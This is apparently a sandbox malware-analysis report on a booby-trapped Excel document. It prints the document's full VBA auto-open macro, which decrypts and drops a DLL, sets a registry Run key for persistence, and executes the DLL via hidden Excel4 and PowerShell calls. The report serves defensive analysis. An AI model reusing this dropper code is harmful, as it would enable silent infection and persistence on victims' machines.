5ad401c3...90b7 | Files
Try VMRay Analyzer
VTI SCORE: 95/100
Dynamic Analysis Report
Classification:
Keylogger
Dropper
Threat Names: -
Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\Council-of-Europe-.xls Sample File Excel Document
Malicious
»
Mime Type application/vnd.ms-excel
File Size 1.71 MB
MD5 c89eb0682aa568b8f3d8e5cde23e1fed Copy to Clipboard
SHA1 35463c4d947f4a275416b22dd6a271fd0c99d94e Copy to Clipboard
SHA256 5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7 Copy to Clipboard
SSDeep 12288:P8RFy14R0yPXfaVhf8xUAuoTf4suMg5dBvPeiA7hJdf9NudvZt0dzzs97Z7KPMme:x4RO Copy to Clipboard
ImpHash -
Office Information
»
Create Time 2015-06-05 18:17:20+00:00
Modify Time 2020-04-07 07:54:22+00:00
Document Information
»
Codepage ANSI_Latin1
Application Microsoft Excel
App Version 15.0
Document Security NONE
Titles Of Parts Sheet1, Sheet2
scale_crop False
shared_doc False
Controls (1)
»
CLSID Control Name Associated Vulnerability
{00020820-0000-0000-C000-000000000046} Excel97Sheet -
VBA Macros (2)
»
Macro #1: Module1
»
Attribute VB_Name = "Module1"
Sub sa()

End Sub
Macro #2: ThisWorkbook
»
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function SZpmrPBsT(h)
  Dim a: a = Split(h)
  Dim i
  For i = 0 To UBound(a)
      a(i) = Chr("&H" & a(i))
  Next
  h2s = Join(a, "")
  SZpmrPBsT = h2s
End Function

Sub Workbook_Open()
    mykk = "qnZeVsoOpmeN"
    Dim g
    d = "MsgBox ('Invalid User and Passwdord')"
    Dim AC
    For i = 1 To 70
        Celles = "A" + CStr(i)
        A1 = ThisWorkbook.Sheets("Sheet2").Range(Celles).Value
        If A1 = "" Then
            Exit For
        End If
        AC = AC + A1
    Next i
    Dim o
    d = "MsgBox ('Please login')"
    Set Ofile = CreateObject("Scripting.FileSystemObject")
    o = xoAOvMNPSVo(mykk, AC)
    Dim dd
    dd = SZpmrPBsT("43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c")
    lkd = hMqirSfTAmm(o)
    Set WText = Ofile.CreateTextFile(dd)
    WText.WriteLine Left(lkd, Len(lkd) - 1)
    WText.Close
    Dim func
    func = SZpmrPBsT("43 41 4c 4c")
    Dim lib
    lib = SZpmrPBsT("4b 65 72 6e 65 6c 33 32")
    Dim ok
    ok = SZpmrPBsT("57 69 6e 45 78 65 63")
    Dim go
    Dim goo
    goo = SZpmrPBsT("52 45 47 20 41 44 44 20 48 4b 43 55 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 52 75 6e 20 2f 76 20 41 75 74 6f 53 74 61 72 74 20 2f 74 20 52 45 47 5f 53 5a 20 2f 64 20 22 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c 2c 53 74 61 72 74 22")
    Set WText = Ofile.CreateTextFile(SZpmrPBsT("43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 74 74 2e 62 61 74"))
    WText.WriteLine goo
    WText.Close
    Dim lets
    lets = SZpmrPBsT("63 6d 64 2e 65 78 65 20 2f 63 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 74 74 2e 62 61 74")
    Application.ExecuteExcel4Macro Replace(Replace(Replace(Replace("{{}}(""[]"", ""{^}"", ""JCCJ"", ""[*]"", 0)", "{{}}", func), "[]", lib), "{^}", ok), "[*]", lets)
    go = SZpmrPBsT("70 6f 77 65 72 73 68 65 6c 6c 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c 2c 53 74 61 72 74")
    Application.ExecuteExcel4Macro Replace(Replace(Replace(Replace("{{}}(""[]"", ""{^}"", ""JCCJ"", ""[*]"", 0)", "{{}}", func), "[]", lib), "{^}", ok), "[*]", go)
    d = "MsgBox ('This is a valid password.')"

End Sub

Function xoAOvMNPSVo(yy, msg)
    Dim outre
    Dim intCoun
    a = Split(msg, ",")
    msg_len = UBound(a)
    Dim x
    For x = 0 To msg_len
        key_a = Mid(yy, intCoun + 1, 1)
        If intCoun = Len(yy) Then
            intCoun = 0
            key_a = Mid(yy, intCoun + 1, 1)
        End If
        intCoun = intCoun + 1
        Dim ll
        ll = CInt("&H" & Replace(a(x), "0x", ""))
        fg = ll - (Asc(key_a) + 256) Mod 256
        gdd_a = Chr(fg)
        outre = outre + gdd_a
    Next
    xoAOvMNPSVo = outre
End Function

Function hMqirSfTAmm(ss)
        brt = SZpmrPBsT("41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f")
        Dim stringlen, resOut, grpBegin
        stringlen = Len(ss) - 1
        newstring = Left(ss, stringlen)
        For grpBegin = 1 To stringlen Step 4
               Dim numDataBytes, CharCounter, Oo, Pp, nGcount, pOut
               numDataBytes = 3
               nGcount = 0
               For CharCounter = 0 To 3
                   Oo = Mid(newstring, grpBegin + CharCounter, 1)
                   If Oo = "=" Then
                       numDataBytes = numDataBytes - 1
                        Pp = 0
                    Else
                        Pp = InStr(1, brt, Oo, vbBinaryCompare) - 1
                    End If
                    Dim tr
                    tr = 64 * nGcount
                    nGcount = tr + Pp
                Next
           nGcount = Hex(nGcount)
           Dim ds
           ds = String(6 - Len(nGcount), "0")
           nGcount = ds & nGcount
           Dim po
           po = CByte("&H" & Mid(nGcount, 1, 2))
           pOut = Chr(po)
           pOut = pOut + Chr(CByte("&H" & Mid(nGcount, 3, 2)))
           pOut = pOut + Chr(CByte("&H" & Mid(nGcount, 5, 2)))
           resOut = resOut & Left(pOut, numDataBytes)
       Next
       hMqirSfTAmm = resOut
End Function

YARA Matches (1)
»
Rule Name Rule Description Classification Score Actions
VBA_Create_File VBA macro contains file creation commands; possible dropper -
2/5
C:\ProgramData\DataExchange.dll Dropped File Binary
Unknown
»
Mime Type application/vnd.microsoft.portable-executable
File Size 235.00 KB
MD5 959e28f5cb3fea8299bf2fe3ec268ebb Copy to Clipboard
SHA1 6c5ff79550fb4c0acc71c3c6da3dc5afe6fea822 Copy to Clipboard
SHA256 2361ee9c49fbe2a6302b3b01c1cc5893359ccee2782be42976d9e6f5efb14d84 Copy to Clipboard
SSDeep 3072:dLLijkWk0Uj1HxOob/90B7JdNHZUsfLcG+EcskoGmlu6gAg0FubPyyjBnas1UaAB:dmkzkPNys4G+EcsyAOj/jBhiaY Copy to Clipboard
ImpHash 4efff83e30680d340096e552cf53aedc Copy to Clipboard
PE Information
»
Image Base 0x10000000
Entry Point 0x1000f046
Size Of Code 0x26a00
Size Of Initialized Data 0x14e00
File Type FileType.dll
Subsystem Subsystem.windows_cui
Machine Type MachineType.i386
Compile Timestamp 2020-04-06 11:07:00+00:00
Sections (6)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x10001000 0x26813 0x26a00 0x400 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.62
.rdata 0x10028000 0xf3c6 0xf400 0x26e00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 5.63
.data 0x10038000 0x1d28 0xe00 0x36200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 3.72
.tls 0x1003a000 0x13a5 0x1400 0x37000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.0
.rsrc 0x1003c000 0x1e0 0x200 0x38400 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 4.72
.reloc 0x1003d000 0x24d8 0x2600 0x38600 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 6.5
Imports (6)
»
KERNEL32.dll (82)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CreatePipe 0x0 0x10028018 0x36b64 0x35964 0xda
PeekNamedPipe 0x0 0x1002801c 0x36b68 0x35968 0x413
MultiByteToWideChar 0x0 0x10028020 0x36b6c 0x3596c 0x3e0
CloseHandle 0x0 0x10028024 0x36b70 0x35970 0x84
CreateProcessW 0x0 0x10028028 0x36b74 0x35974 0xe2
WriteFile 0x0 0x1002802c 0x36b78 0x35978 0x5fc
CreateFileW 0x0 0x10028030 0x36b7c 0x3597c 0xc8
WideCharToMultiByte 0x0 0x10028034 0x36b80 0x35980 0x5e8
ReadFile 0x0 0x10028038 0x36b84 0x35984 0x463
GetComputerNameW 0x0 0x1002803c 0x36b88 0x35988 0x1da
GetVersion 0x0 0x10028040 0x36b8c 0x3598c 0x30f
FlushFileBuffers 0x0 0x10028044 0x36b90 0x35990 0x19a
SetFilePointerEx 0x0 0x10028048 0x36b94 0x35994 0x512
GetConsoleMode 0x0 0x1002804c 0x36b98 0x35998 0x1f7
GetConsoleCP 0x0 0x10028050 0x36b9c 0x3599c 0x1e5
HeapSize 0x0 0x10028054 0x36ba0 0x359a0 0x344
SetStdHandle 0x0 0x10028058 0x36ba4 0x359a4 0x539
Sleep 0x0 0x1002805c 0x36ba8 0x359a8 0x56a
VirtualAlloc 0x0 0x10028060 0x36bac 0x359ac 0x5b3
FreeEnvironmentStringsW 0x0 0x10028064 0x36bb0 0x359b0 0x1a5
GetEnvironmentStringsW 0x0 0x10028068 0x36bb4 0x359b4 0x230
GetCommandLineW 0x0 0x1002806c 0x36bb8 0x359b8 0x1d2
WriteConsoleW 0x0 0x10028070 0x36bbc 0x359bc 0x5fb
VirtualFree 0x0 0x10028074 0x36bc0 0x359c0 0x5b6
EnterCriticalSection 0x0 0x10028078 0x36bc4 0x359c4 0x12d
LeaveCriticalSection 0x0 0x1002807c 0x36bc8 0x359c8 0x3b0
DeleteCriticalSection 0x0 0x10028080 0x36bcc 0x359cc 0x10c
EncodePointer 0x0 0x10028084 0x36bd0 0x359d0 0x129
DecodePointer 0x0 0x10028088 0x36bd4 0x359d4 0x105
SetLastError 0x0 0x1002808c 0x36bd8 0x359d8 0x521
InitializeCriticalSectionAndSpinCount 0x0 0x10028090 0x36bdc 0x359dc 0x354
CreateEventW 0x0 0x10028094 0x36be0 0x359e0 0xbc
TlsAlloc 0x0 0x10028098 0x36be4 0x359e4 0x58b
TlsGetValue 0x0 0x1002809c 0x36be8 0x359e8 0x58d
TlsSetValue 0x0 0x100280a0 0x36bec 0x359ec 0x58e
TlsFree 0x0 0x100280a4 0x36bf0 0x359f0 0x58c
GetSystemTimeAsFileTime 0x0 0x100280a8 0x36bf4 0x359f4 0x2e1
GetModuleHandleW 0x0 0x100280ac 0x36bf8 0x359f8 0x270
GetProcAddress 0x0 0x100280b0 0x36bfc 0x359fc 0x2a6
LCMapStringW 0x0 0x100280b4 0x36c00 0x35a00 0x3a4
GetLocaleInfoW 0x0 0x100280b8 0x36c04 0x35a04 0x25d
GetStringTypeW 0x0 0x100280bc 0x36c08 0x35a08 0x2cf
GetCPInfo 0x0 0x100280c0 0x36c0c 0x35a0c 0x1bc
SetEvent 0x0 0x100280c4 0x36c10 0x35a10 0x505
ResetEvent 0x0 0x100280c8 0x36c14 0x35a14 0x4b6
WaitForSingleObjectEx 0x0 0x100280cc 0x36c18 0x35a18 0x5c5
UnhandledExceptionFilter 0x0 0x100280d0 0x36c1c 0x35a1c 0x59a
SetUnhandledExceptionFilter 0x0 0x100280d4 0x36c20 0x35a20 0x55b
GetCurrentProcess 0x0 0x100280d8 0x36c24 0x35a24 0x212
TerminateProcess 0x0 0x100280dc 0x36c28 0x35a28 0x579
IsProcessorFeaturePresent 0x0 0x100280e0 0x36c2c 0x35a2c 0x37b
IsDebuggerPresent 0x0 0x100280e4 0x36c30 0x35a30 0x374
GetStartupInfoW 0x0 0x100280e8 0x36c34 0x35a34 0x2c8
QueryPerformanceCounter 0x0 0x100280ec 0x36c38 0x35a38 0x43e
GetCurrentProcessId 0x0 0x100280f0 0x36c3c 0x35a3c 0x213
GetCurrentThreadId 0x0 0x100280f4 0x36c40 0x35a40 0x217
InitializeSListHead 0x0 0x100280f8 0x36c44 0x35a44 0x358
RtlUnwind 0x0 0x100280fc 0x36c48 0x35a48 0x4c2
RaiseException 0x0 0x10028100 0x36c4c 0x35a4c 0x453
GetLastError 0x0 0x10028104 0x36c50 0x35a50 0x259
FreeLibrary 0x0 0x10028108 0x36c54 0x35a54 0x1a6
LoadLibraryExW 0x0 0x1002810c 0x36c58 0x35a58 0x3b6
InterlockedFlushSList 0x0 0x10028110 0x36c5c 0x35a5c 0x361
HeapAlloc 0x0 0x10028114 0x36c60 0x35a60 0x33b
HeapReAlloc 0x0 0x10028118 0x36c64 0x35a64 0x342
HeapFree 0x0 0x1002811c 0x36c68 0x35a68 0x33f
ExitProcess 0x0 0x10028120 0x36c6c 0x35a6c 0x159
GetModuleHandleExW 0x0 0x10028124 0x36c70 0x35a70 0x26f
GetModuleFileNameA 0x0 0x10028128 0x36c74 0x35a74 0x26b
GetACP 0x0 0x1002812c 0x36c78 0x35a78 0x1ad
GetStdHandle 0x0 0x10028130 0x36c7c 0x35a7c 0x2ca
GetFileType 0x0 0x10028134 0x36c80 0x35a80 0x247
IsValidLocale 0x0 0x10028138 0x36c84 0x35a84 0x382
GetUserDefaultLCID 0x0 0x1002813c 0x36c88 0x35a88 0x308
EnumSystemLocalesW 0x0 0x10028140 0x36c8c 0x35a8c 0x14f
GetProcessHeap 0x0 0x10028144 0x36c90 0x35a90 0x2ac
FindClose 0x0 0x10028148 0x36c94 0x35a94 0x170
FindFirstFileExA 0x0 0x1002814c 0x36c98 0x35a98 0x175
FindNextFileA 0x0 0x10028150 0x36c9c 0x35a9c 0x185
IsValidCodePage 0x0 0x10028154 0x36ca0 0x35aa0 0x380
GetOEMCP 0x0 0x10028158 0x36ca4 0x35aa4 0x28f
GetCommandLineA 0x0 0x1002815c 0x36ca8 0x35aa8 0x1d1
USER32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
wsprintfW 0x0 0x10028164 0x36cb0 0x35ab0 0x3ac
ADVAPI32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetUserNameA 0x0 0x10028000 0x36b4c 0x3594c 0x179
bcrypt.dll (7)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
BCryptHashData 0x0 0x1002816c 0x36cb8 0x35ab8 0x23
BCryptFinishHash 0x0 0x10028170 0x36cbc 0x35abc 0x1b
BCryptOpenAlgorithmProvider 0x0 0x10028174 0x36cc0 0x35ac0 0x27
BCryptGetProperty 0x0 0x10028178 0x36cc4 0x35ac4 0x21
BCryptCreateHash 0x0 0x1002817c 0x36cc8 0x35ac8 0x6
BCryptCloseAlgorithmProvider 0x0 0x10028180 0x36ccc 0x35acc 0x2
BCryptDestroyHash 0x0 0x10028184 0x36cd0 0x35ad0 0xd
DNSAPI.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
DnsQuery_A 0x0 0x10028008 0x36b54 0x35954 0x5f
IPHLPAPI.DLL (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetAdaptersInfo 0x0 0x10028010 0x36b5c 0x3595c 0x40
Exports (1)
»
Api name EAT Address Ordinal
Start 0x63b0 0x1
C:\ProgramData\tt.bat Dropped File Batch
Unknown
»
Mime Type application/x-bat
File Size 139 Bytes
MD5 36dc19d145b4b39a24150055080e47bf Copy to Clipboard
SHA1 e02effb961a3e9d8994f21b008e959045465f03c Copy to Clipboard
SHA256 8f93f7e1f6865e41ae718899718fb4ff9116d5986eb83a7fe6dad54595d4fb02 Copy to Clipboard
SSDeep 3:28D9so3KRfyM1K7eDBFaRwRyid4JL4AcfDKCkRERrcKaov:rtuH1jGwUidYkjfao1jv Copy to Clipboard
ImpHash -
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image